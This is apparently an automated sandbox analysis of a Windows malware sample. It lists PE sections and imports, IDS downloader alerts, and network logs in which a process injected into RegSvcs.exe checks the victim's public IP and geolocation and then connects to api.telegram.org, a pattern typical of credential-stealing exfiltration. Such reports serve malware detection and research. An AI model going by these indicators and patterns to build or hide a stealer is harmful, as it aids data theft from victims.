IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x2d3a8 | 0x2d400 | eaba64bd719ebe3e6cde0622269e342f | False | 0.9525207182320442 | data | 7.915724735056287 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf5000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc7458 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc7580 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc76a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc77d0 | 0x162c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.906800563777308
RT_MENU | 0xc8dfc | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xc8e4c | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xc93e0 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xc9a6c | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xc9efc | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xca4f8 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcab54 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcafbc | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcb114 | 0x28d77 | data | | | 1.0003646427995003
RT_GROUP_ICON | 0xf3e8c | 0x14 | data | English | Great Britain | 1.2
RT_GROUP_ICON | 0xf3ea0 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xf3eb4 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xf3ec8 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xf3edc | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0xf3fb8 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T00:30:18.217728+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 132.226.8.169 | 80 | TCP
2024-12-18T00:30:21.706195+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 132.226.8.169 | 80 | TCP
2024-12-18T00:30:24.572922+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 132.226.8.169 | 80 | TCP
2024-12-18T00:30:28.135272+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 132.226.8.169 | 80 | TCP
2024-12-18T00:30:29.869960+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49727 | 172.67.177.134 | 443 | TCP
2024-12-18T00:30:34.432138+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49733 | 132.226.8.169 | 80 | TCP
2024-12-18T00:30:42.150983+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49744 | 132.226.8.169 | 80 | TCP
                                                                                                        Dec 18, 2024 00:30:53.064475060 CET49791443192.168.2.5149.154.167.220
                                                                                                        Dec 18, 2024 00:30:53.064511061 CET44349791149.154.167.220192.168.2.5
                                                                                                        Dec 18, 2024 00:30:54.437153101 CET44349791149.154.167.220192.168.2.5
                                                                                                        Dec 18, 2024 00:30:54.437285900 CET49791443192.168.2.5149.154.167.220
                                                                                                        Dec 18, 2024 00:30:54.440937996 CET49791443192.168.2.5149.154.167.220
                                                                                                        Dec 18, 2024 00:30:54.440968990 CET44349791149.154.167.220192.168.2.5
                                                                                                        Dec 18, 2024 00:30:54.441242933 CET44349791149.154.167.220192.168.2.5
                                                                                                        Dec 18, 2024 00:30:54.442538023 CET49791443192.168.2.5149.154.167.220
                                                                                                        Dec 18, 2024 00:30:54.483385086 CET44349791149.154.167.220192.168.2.5
                                                                                                        Dec 18, 2024 00:30:54.940376997 CET44349791149.154.167.220192.168.2.5
                                                                                                        Dec 18, 2024 00:30:54.940439939 CET44349791149.154.167.220192.168.2.5
                                                                                                        Dec 18, 2024 00:30:54.940669060 CET49791443192.168.2.5149.154.167.220
                                                                                                        Dec 18, 2024 00:30:54.940886974 CET49791443192.168.2.5149.154.167.220
                                                                                                        Dec 18, 2024 00:31:09.359272957 CET4973380192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:31:57.838831902 CET8049780132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:31:57.839086056 CET4978080192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:32:32.854612112 CET4978080192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:32:32.974344015 CET8049780132.226.8.169192.168.2.5
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 18, 2024 00:30:07.337650061 CET  52458        53         192.168.2.5  1.1.1.1
Dec 18, 2024 00:30:07.474836111 CET  53           52458      1.1.1.1      192.168.2.5
Dec 18, 2024 00:30:24.593772888 CET  61009        53         192.168.2.5  1.1.1.1
Dec 18, 2024 00:30:24.952507019 CET  53           61009      1.1.1.1      192.168.2.5
Dec 18, 2024 00:30:52.853662014 CET  51109        53         192.168.2.5  1.1.1.1
Dec 18, 2024 00:30:53.063066959 CET  53           51109      1.1.1.1      192.168.2.5
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                 Type            Class        DNS over HTTPS
Dec 18, 2024 00:30:07.337650061 CET  192.168.2.5  1.1.1.1  0xb410    Standard query (0)  checkip.dyndns.org   A (IP address)  IN (0x0001)  false
Dec 18, 2024 00:30:24.593772888 CET  192.168.2.5  1.1.1.1  0xd0d     Standard query (0)  reallyfreegeoip.org  A (IP address)  IN (0x0001)  false
Dec 18, 2024 00:30:52.853662014 CET  192.168.2.5  1.1.1.1  0xd45     Standard query (0)  api.telegram.org     A (IP address)  IN (0x0001)  false
Timestamp                            Source IP    Dest IP      Trans ID  Reply Code    Name                 CName               Address          Type                    Class        DNS over HTTPS
Dec 18, 2024 00:30:07.474836111 CET  1.1.1.1      192.168.2.5  0xb410    No error (0)  checkip.dyndns.org   checkip.dyndns.com                   CNAME (Canonical name)  IN (0x0001)  false
Dec 18, 2024 00:30:07.474836111 CET  1.1.1.1      192.168.2.5  0xb410    No error (0)  checkip.dyndns.com                       132.226.8.169    A (IP address)          IN (0x0001)  false
Dec 18, 2024 00:30:07.474836111 CET  1.1.1.1      192.168.2.5  0xb410    No error (0)  checkip.dyndns.com                       193.122.130.0    A (IP address)          IN (0x0001)  false
Dec 18, 2024 00:30:07.474836111 CET  1.1.1.1      192.168.2.5  0xb410    No error (0)  checkip.dyndns.com                       158.101.44.242   A (IP address)          IN (0x0001)  false
Dec 18, 2024 00:30:07.474836111 CET  1.1.1.1      192.168.2.5  0xb410    No error (0)  checkip.dyndns.com                       193.122.6.168    A (IP address)          IN (0x0001)  false
Dec 18, 2024 00:30:07.474836111 CET  1.1.1.1      192.168.2.5  0xb410    No error (0)  checkip.dyndns.com                       132.226.247.73   A (IP address)          IN (0x0001)  false
Dec 18, 2024 00:30:24.952507019 CET  1.1.1.1      192.168.2.5  0xd0d     No error (0)  reallyfreegeoip.org                      172.67.177.134   A (IP address)          IN (0x0001)  false
Dec 18, 2024 00:30:24.952507019 CET  1.1.1.1      192.168.2.5  0xd0d     No error (0)  reallyfreegeoip.org                      104.21.67.152    A (IP address)          IN (0x0001)  false
Dec 18, 2024 00:30:53.063066959 CET  1.1.1.1      192.168.2.5  0xd45     No error (0)  api.telegram.org                         149.154.167.220  A (IP address)          IN (0x0001)  false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49704        132.226.8.169   80                5908  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 18, 2024 00:30:07.603033066 CET  151                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 18, 2024 00:30:14.667406082 CET  273                IN         HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 23:30:14 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 18, 2024 00:30:14.674053907 CET  127                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 18, 2024 00:30:18.200440884 CET  697                IN         HTTP/1.1 504 Gateway Time-out
    Date: Tue, 17 Dec 2024 23:30:17 GMT
    Content-Type: text/html
    Content-Length: 557
    Connection: keep-alive
    Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 18, 2024 00:30:18.217727900 CET  127                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 18, 2024 00:30:21.703111887 CET  697                IN         HTTP/1.1 504 Gateway Time-out
    Date: Tue, 17 Dec 2024 23:30:21 GMT
    Content-Type: text/html
    Content-Length: 557
    Connection: keep-alive
    Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 18, 2024 00:30:21.706195116 CET  127                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 18, 2024 00:30:24.529366970 CET  273                IN         HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 23:30:24 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 18, 2024 00:30:26.666933060 CET  127                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 18, 2024 00:30:28.088547945 CET  273                IN         HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 23:30:27 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49733        132.226.8.169   80                5908  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 18, 2024 00:30:29.993885040 CET  127                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 18, 2024 00:30:34.385238886 CET  697                IN         HTTP/1.1 504 Gateway Time-out
    Date: Tue, 17 Dec 2024 23:30:34 GMT
    Content-Type: text/html
    Content-Length: 557
    Connection: keep-alive
    Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.5  49744        132.226.8.169   80                5908  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 18, 2024 00:30:34.511796951 CET  151                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 18, 2024 00:30:40.511976957 CET  697                IN         HTTP/1.1 504 Gateway Time-out
    Date: Tue, 17 Dec 2024 23:30:40 GMT
    Content-Type: text/html
    Content-Length: 557
    Connection: keep-alive
    Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 18, 2024 00:30:40.517021894 CET  127                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 18, 2024 00:30:42.104749918 CET  273                IN         HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 23:30:41 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.5  49769        132.226.8.169   80                5908  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 18, 2024 00:30:43.902118921 CET  151                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 18, 2024 00:30:48.299925089 CET  697                IN         HTTP/1.1 504 Gateway Time-out
    Date: Tue, 17 Dec 2024 23:30:48 GMT
    Content-Type: text/html
    Content-Length: 557
    Connection: keep-alive
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                        Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49780 | 132.226.8.169 | 80 | 5908 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 00:30:48.433233023 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
